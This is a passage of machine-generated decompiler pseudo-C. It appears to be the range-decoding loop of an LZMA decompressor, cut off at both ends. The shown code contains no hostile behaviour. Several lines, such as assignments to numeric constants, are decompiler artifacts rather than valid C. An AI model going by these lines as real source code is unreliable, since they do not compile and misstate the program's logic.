                                                                        												}
                                                                        												goto L24;
                                                                        											case 4:
                                                                        												L133:
                                                                        												_t531 =  *_t606;
                                                                        												_t589 = _t531 & 0x0000ffff;
                                                                        												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                        												if( *(_t613 - 0xc) >= _t565) {
                                                                        													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                        													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                        													 *(_t613 - 0x40) = 1;
                                                                        													_t532 = _t531 - (_t531 >> 5);
                                                                        													 *_t606 = _t532;
                                                                        												} else {
                                                                        													 *(_t613 - 0x10) = _t565;
                                                                        													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                        													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                        												}
                                                                        												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                        													goto L139;
                                                                        												}
                                                                        											case 5:
                                                                        												goto L137;
                                                                        											case 6:
                                                                        												__edx = 0;
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													__eax =  *(__ebp - 4);
                                                                        													__ecx =  *(__ebp - 0x38);
                                                                        													 *(__ebp - 0x34) = 1;
                                                                        													 *(__ebp - 0x84) = 7;
                                                                        													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                        													while(1) {
                                                                        														L132:
                                                                        														 *(_t613 - 0x54) = _t606;
                                                                        														goto L133;
                                                                        													}
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                        												__esi =  *(__ebp - 0x60);
                                                                        												__cl = 8;
                                                                        												__cl = 8 -  *(__ebp - 0x3c);
                                                                        												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                        												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                        												__ecx =  *(__ebp - 0x3c);
                                                                        												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                        												__ecx =  *(__ebp - 4);
                                                                        												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                        												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                        												__eflags =  *(__ebp - 0x38) - 4;
                                                                        												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                        												if( *(__ebp - 0x38) >= 4) {
                                                                        													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                        													if( *(__ebp - 0x38) >= 0xa) {
                                                                        														_t98 = __ebp - 0x38;
                                                                        														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                        														__eflags =  *_t98;
                                                                        													} else {
                                                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                        													}
                                                                        												} else {
                                                                        													 *(__ebp - 0x38) = 0;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x34) - __edx;
                                                                        												if( *(__ebp - 0x34) == __edx) {
                                                                        													__ebx = 0;
                                                                        													__ebx = 1;
                                                                        													goto L61;
                                                                        												} else {
                                                                        													__eax =  *(__ebp - 0x14);
                                                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        													__eflags = __eax -  *(__ebp - 0x74);
                                                                        													if(__eax >=  *(__ebp - 0x74)) {
                                                                        														__eax = __eax +  *(__ebp - 0x74);
                                                                        														__eflags = __eax;
                                                                        													}
                                                                        													__ecx =  *(__ebp - 8);
                                                                        													__ebx = 0;
                                                                        													__ebx = 1;
                                                                        													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                        													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                        													goto L41;
                                                                        												}
                                                                        											case 7:
                                                                        												__eflags =  *(__ebp - 0x40) - 1;
                                                                        												if( *(__ebp - 0x40) != 1) {
                                                                        													__eax =  *(__ebp - 0x24);
                                                                        													 *(__ebp - 0x80) = 0x16;
                                                                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        													__eax =  *(__ebp - 0x28);
                                                                        													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        													__eax =  *(__ebp - 0x2c);
                                                                        													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        													__eax = 0;
                                                                        													__eflags =  *(__ebp - 0x38) - 7;
                                                                        													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        													__al = __al & 0x000000fd;
                                                                        													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                        													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                        													__eax =  *(__ebp - 4);
                                                                        													__eax =  *(__ebp - 4) + 0x664;
                                                                        													__eflags = __eax;
                                                                        													 *(__ebp - 0x58) = __eax;
                                                                        													goto L69;
                                                                        												}
                                                                        												__eax =  *(__ebp - 4);
                                                                        												__ecx =  *(__ebp - 0x38);
                                                                        												 *(__ebp - 0x84) = 8;
                                                                        												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                        												while(1) {
                                                                        													L132:
                                                                        													 *(_t613 - 0x54) = _t606;
                                                                        													goto L133;
                                                                        												}
                                                                        											case 8:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													__eax =  *(__ebp - 4);
                                                                        													__ecx =  *(__ebp - 0x38);
                                                                        													 *(__ebp - 0x84) = 0xa;
                                                                        													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                        												} else {
                                                                        													__eax =  *(__ebp - 0x38);
                                                                        													__ecx =  *(__ebp - 4);
                                                                        													__eax =  *(__ebp - 0x38) + 0xf;
                                                                        													 *(__ebp - 0x84) = 9;
                                                                        													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                        													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                        												}
                                                                        												while(1) {
                                                                        													L132:
                                                                        													 *(_t613 - 0x54) = _t606;
                                                                        													goto L133;
                                                                        												}
                                                                        											case 9:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													goto L89;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x60);
                                                                        												if( *(__ebp - 0x60) == 0) {
                                                                        													goto L171;
                                                                        												}
                                                                        												__eax = 0;
                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                        												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                        												__eflags = _t259;
                                                                        												0 | _t259 = _t259 + _t259 + 9;
                                                                        												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                        												goto L76;
                                                                        											case 0xa:
                                                                        												goto L0;
                                                                        											case 0xb:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													__ecx =  *(__ebp - 0x24);
                                                                        													__eax =  *(__ebp - 0x20);
                                                                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                        												} else {
                                                                        													__eax =  *(__ebp - 0x24);
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x28);
                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                        												goto L88;
                                                                        											case 0xc:
                                                                        												L99:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0xc;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t334 = __ebp - 0x70;
                                                                        												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t334;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												__eax =  *(__ebp - 0x2c);
                                                                        												goto L101;
                                                                        											case 0xd:
                                                                        												L37:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0xd;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t122 = __ebp - 0x70;
                                                                        												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t122;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												L39:
                                                                        												__eax =  *(__ebp - 0x40);
                                                                        												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                        													goto L48;
                                                                        												}
                                                                        												__eflags = __ebx - 0x100;
                                                                        												if(__ebx >= 0x100) {
                                                                        													goto L54;
                                                                        												}
                                                                        												L41:
                                                                        												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                        												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                        												__ecx =  *(__ebp - 0x58);
                                                                        												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                        												 *(__ebp - 0x48) = __eax;
                                                                        												__eax = __eax + 1;
                                                                        												__eax = __eax << 8;
                                                                        												__eax = __eax + __ebx;
                                                                        												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        												__ax =  *__esi;
                                                                        												 *(__ebp - 0x54) = __esi;
                                                                        												__edx = __ax & 0x0000ffff;
                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        													__cx = __ax;
                                                                        													 *(__ebp - 0x40) = 1;
                                                                        													__cx = __ax >> 5;
                                                                        													__eflags = __eax;
                                                                        													__ebx = __ebx + __ebx + 1;
                                                                        													 *__esi = __ax;
                                                                        												} else {
                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                        													0x800 = 0x800 - __edx;
                                                                        													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                        													__ebx = __ebx + __ebx;
                                                                        													 *__esi = __cx;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        													goto L39;
                                                                        												} else {
                                                                        													goto L37;
                                                                        												}
                                                                        											case 0xe:
                                                                        												L46:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0xe;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t156 = __ebp - 0x70;
                                                                        												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t156;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												while(1) {
                                                                        													L48:
                                                                        													__eflags = __ebx - 0x100;
                                                                        													if(__ebx >= 0x100) {
                                                                        														break;
                                                                        													}
                                                                        													__eax =  *(__ebp - 0x58);
                                                                        													__edx = __ebx + __ebx;
                                                                        													__ecx =  *(__ebp - 0x10);
                                                                        													__esi = __edx + __eax;
                                                                        													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        													__ax =  *__esi;
                                                                        													 *(__ebp - 0x54) = __esi;
                                                                        													__edi = __ax & 0x0000ffff;
                                                                        													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        													if( *(__ebp - 0xc) >= __ecx) {
                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        														__cx = __ax;
                                                                        														_t170 = __edx + 1; // 0x1
                                                                        														__ebx = _t170;
                                                                        														__cx = __ax >> 5;
                                                                        														__eflags = __eax;
                                                                        														 *__esi = __ax;
                                                                        													} else {
                                                                        														 *(__ebp - 0x10) = __ecx;
                                                                        														0x800 = 0x800 - __edi;
                                                                        														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        														__ebx = __ebx + __ebx;
                                                                        														 *__esi = __cx;
                                                                        													}
                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        														continue;
                                                                        													} else {
                                                                        														goto L46;
                                                                        													}
                                                                        												}
                                                                        												L54:
                                                                        												_t173 = __ebp - 0x34;
                                                                        												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                        												__eflags =  *_t173;
                                                                        												goto L55;
                                                                        											case 0xf:
                                                                        												L58:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0xf;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t203 = __ebp - 0x70;
                                                                        												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t203;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												L60:
                                                                        												__eflags = __ebx - 0x100;
                                                                        												if(__ebx >= 0x100) {
                                                                        													L55:
                                                                        													__al =  *(__ebp - 0x44);
                                                                        													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                        													goto L56;
                                                                        												}
                                                                        												L61:
                                                                        												__eax =  *(__ebp - 0x58);
                                                                        												__edx = __ebx + __ebx;
                                                                        												__ecx =  *(__ebp - 0x10);
                                                                        												__esi = __edx + __eax;
                                                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        												__ax =  *__esi;
                                                                        												 *(__ebp - 0x54) = __esi;
                                                                        												__edi = __ax & 0x0000ffff;
                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        													__cx = __ax;
                                                                        													_t217 = __edx + 1; // 0x1
                                                                        													__ebx = _t217;
                                                                        													__cx = __ax >> 5;
                                                                        													__eflags = __eax;
                                                                        													 *__esi = __ax;
                                                                        												} else {
                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                        													0x800 = 0x800 - __edi;
                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        													__ebx = __ebx + __ebx;
                                                                        													 *__esi = __cx;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        													goto L60;
                                                                        												} else {
                                                                        													goto L58;
                                                                        												}
                                                                        											case 0x10:
                                                                        												L109:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0x10;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t365 = __ebp - 0x70;
                                                                        												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t365;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												goto L111;
                                                                        											case 0x11:
                                                                        												goto L69;
                                                                        											case 0x12:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													__eax =  *(__ebp - 0x58);
                                                                        													 *(__ebp - 0x84) = 0x13;
                                                                        													__esi =  *(__ebp - 0x58) + 2;
                                                                        													while(1) {
                                                                        														L132:
                                                                        														 *(_t613 - 0x54) = _t606;
                                                                        														goto L133;
                                                                        													}
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x4c);
                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                        												__ecx =  *(__ebp - 0x58);
                                                                        												__eax =  *(__ebp - 0x4c) << 4;
                                                                        												__eflags = __eax;
                                                                        												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                        												goto L130;
                                                                        											case 0x13:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													_t469 = __ebp - 0x58;
                                                                        													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                        													__eflags =  *_t469;
                                                                        													 *(__ebp - 0x30) = 0x10;
                                                                        													 *(__ebp - 0x40) = 8;
                                                                        													L144:
                                                                        													 *(__ebp - 0x7c) = 0x14;
                                                                        													goto L145;
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x4c);
                                                                        												__ecx =  *(__ebp - 0x58);
                                                                        												__eax =  *(__ebp - 0x4c) << 4;
                                                                        												 *(__ebp - 0x30) = 8;
                                                                        												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                        												L130:
                                                                        												 *(__ebp - 0x58) = __eax;
                                                                        												 *(__ebp - 0x40) = 3;
                                                                        												goto L144;
                                                                        											case 0x14:
                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                        												__eax =  *(__ebp - 0x80);
                                                                        												 *(_t613 - 0x88) = _t533;
                                                                        												goto L1;
                                                                        											case 0x15:
                                                                        												__eax = 0;
                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        												__al = __al & 0x000000fd;
                                                                        												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                        												goto L120;
                                                                        											case 0x16:
                                                                        												__eax =  *(__ebp - 0x30);
                                                                        												__eflags = __eax - 4;
                                                                        												if(__eax >= 4) {
                                                                        													_push(3);
                                                                        													_pop(__eax);
                                                                        												}
                                                                        												__ecx =  *(__ebp - 4);
                                                                        												 *(__ebp - 0x40) = 6;
                                                                        												__eax = __eax << 7;
                                                                        												 *(__ebp - 0x7c) = 0x19;
                                                                        												 *(__ebp - 0x58) = __eax;
                                                                        												goto L145;
                                                                        											case 0x17:
                                                                        												L145:
                                                                        												__eax =  *(__ebp - 0x40);
                                                                        												 *(__ebp - 0x50) = 1;
                                                                        												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                        												goto L149;
                                                                        											case 0x18:
                                                                        												L146:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0x18;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t484 = __ebp - 0x70;
                                                                        												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t484;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												L148:
                                                                        												_t487 = __ebp - 0x48;
                                                                        												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                        												__eflags =  *_t487;
                                                                        												L149:
                                                                        												__eflags =  *(__ebp - 0x48);
                                                                        												if( *(__ebp - 0x48) <= 0) {
                                                                        													__ecx =  *(__ebp - 0x40);
                                                                        													__ebx =  *(__ebp - 0x50);
                                                                        													0 = 1;
                                                                        													__eax = 1 << __cl;
                                                                        													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                        													__eax =  *(__ebp - 0x7c);
                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                        													while(1) {
                                                                        														 *(_t613 - 0x88) = _t533;
                                                                        														goto L1;
                                                                        													}
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x50);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        												__eax =  *(__ebp - 0x58);
                                                                        												__esi = __edx + __eax;
                                                                        												 *(__ebp - 0x54) = __esi;
                                                                        												__ax =  *__esi;
                                                                        												__edi = __ax & 0x0000ffff;
                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        													__cx = __ax;
                                                                        													__cx = __ax >> 5;
                                                                        													__eax = __eax - __ecx;
                                                                        													__edx = __edx + 1;
                                                                        													__eflags = __edx;
                                                                        													 *__esi = __ax;
                                                                        													 *(__ebp - 0x50) = __edx;
                                                                        												} else {
                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                        													0x800 = 0x800 - __edi;
                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                        													 *__esi = __cx;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        													goto L148;
                                                                        												} else {
                                                                        													goto L146;
                                                                        												}
                                                                        											case 0x19:
                                                                        												__eflags = __ebx - 4;
                                                                        												if(__ebx < 4) {
                                                                        													 *(__ebp - 0x2c) = __ebx;
                                                                        													L119:
                                                                        													_t393 = __ebp - 0x2c;
                                                                        													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                        													__eflags =  *_t393;
                                                                        													L120:
                                                                        													__eax =  *(__ebp - 0x2c);
                                                                        													__eflags = __eax;
                                                                        													if(__eax == 0) {
                                                                        														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                        														goto L170;
                                                                        													}
                                                                        													__eflags = __eax -  *(__ebp - 0x60);
                                                                        													if(__eax >  *(__ebp - 0x60)) {
                                                                        														goto L171;
                                                                        													}
                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                        													__eax =  *(__ebp - 0x30);
                                                                        													_t400 = __ebp - 0x60;
                                                                        													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                        													__eflags =  *_t400;
                                                                        													goto L123;
                                                                        												}
                                                                        												__ecx = __ebx;
                                                                        												__eax = __ebx;
                                                                        												__ecx = __ebx >> 1;
                                                                        												__eax = __ebx & 0x00000001;
                                                                        												__ecx = (__ebx >> 1) - 1;
                                                                        												__al = __al | 0x00000002;
                                                                        												__eax = (__ebx & 0x00000001) << __cl;
                                                                        												__eflags = __ebx - 0xe;
                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                        												if(__ebx >= 0xe) {
                                                                        													__ebx = 0;
                                                                        													 *(__ebp - 0x48) = __ecx;
                                                                        													L102:
                                                                        													__eflags =  *(__ebp - 0x48);
                                                                        													if( *(__ebp - 0x48) <= 0) {
                                                                        														__eax = __eax + __ebx;
                                                                        														 *(__ebp - 0x40) = 4;
                                                                        														 *(__ebp - 0x2c) = __eax;
                                                                        														__eax =  *(__ebp - 4);
                                                                        														__eax =  *(__ebp - 4) + 0x644;
                                                                        														__eflags = __eax;
                                                                        														L108:
                                                                        														__ebx = 0;
                                                                        														 *(__ebp - 0x58) = __eax;
                                                                        														 *(__ebp - 0x50) = 1;
                                                                        														 *(__ebp - 0x44) = 0;
                                                                        														 *(__ebp - 0x48) = 0;
                                                                        														L112:
                                                                        														__eax =  *(__ebp - 0x40);
                                                                        														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                        															_t391 = __ebp - 0x2c;
                                                                        															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                        															__eflags =  *_t391;
                                                                        															goto L119;
                                                                        														}
                                                                        														__eax =  *(__ebp - 0x50);
                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        														__eax =  *(__ebp - 0x58);
                                                                        														__esi = __edi + __eax;
                                                                        														 *(__ebp - 0x54) = __esi;
                                                                        														__ax =  *__esi;
                                                                        														__ecx = __ax & 0x0000ffff;
                                                                        														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                        														__eflags =  *(__ebp - 0xc) - __edx;
                                                                        														if( *(__ebp - 0xc) >= __edx) {
                                                                        															__ecx = 0;
                                                                        															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                        															__ecx = 1;
                                                                        															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                        															__ebx = 1;
                                                                        															__ecx =  *(__ebp - 0x48);
                                                                        															__ebx = 1 << __cl;
                                                                        															__ecx = 1 << __cl;
                                                                        															__ebx =  *(__ebp - 0x44);
                                                                        															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                        															__cx = __ax;
                                                                        															__cx = __ax >> 5;
